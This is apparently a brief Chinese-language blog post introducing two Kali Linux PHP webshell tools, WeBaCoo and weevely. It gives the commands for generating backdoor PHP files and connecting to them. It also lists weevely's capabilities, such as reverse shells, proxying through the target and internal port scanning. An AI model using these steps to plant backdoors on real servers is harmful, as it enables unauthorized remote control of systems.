這裏簡單介紹kali下的兩款工具,時間比較倉促,簡單的說下,後面再繼續更新一些詳細內容
一款小巧的php後門工具:WeBaCoo
全名:Web Backdoor Cookie
簡介:kali已經集成,產生終端性shell,編碼類型通過http頭傳輸,隱蔽性比較強
優缺點:方便簡單,適合作爲臨時shell,沒有密碼,只能用於php
使用方法:
生成服務端程序
webacoo -g -o a.php
客戶端連接:
webacoo -t -u http://127.0.0.1/a.php
連接的權限爲當前服務器的權限,權限比較小,能做的事情很有限.
第二款:weevely
具有隱蔽性的類終端PHP webshell[擁有linux上的菜刀之稱]
30多個強大的管理模塊
可用於執行系統命令,瀏覽文件系統
檢查服務器常見配置錯誤
創建正向,反向TCP Shell鏈接
通過目標主機代理HTTP流量
從目標主機運行端口掃描,進行內網滲透
可以設置密碼,看了網上的很多文章提到了kali自帶的weevely缺少pysockets庫,而不能正常運行,需要安裝其模塊,可以用豆瓣源然後去安裝
https://pypi.doubanio.com/simple
點擊豆瓣源鏈接下載pysockets壓縮包到本地,解壓縮後執行下一條命令
./setup.py install
生成服務端程序:
weevely generate <password> 1.php
客戶端連接:
weevely http://127.0.0.1/1.php <password>
連接成功後,可以做的事情就多了,時間倉促,改日更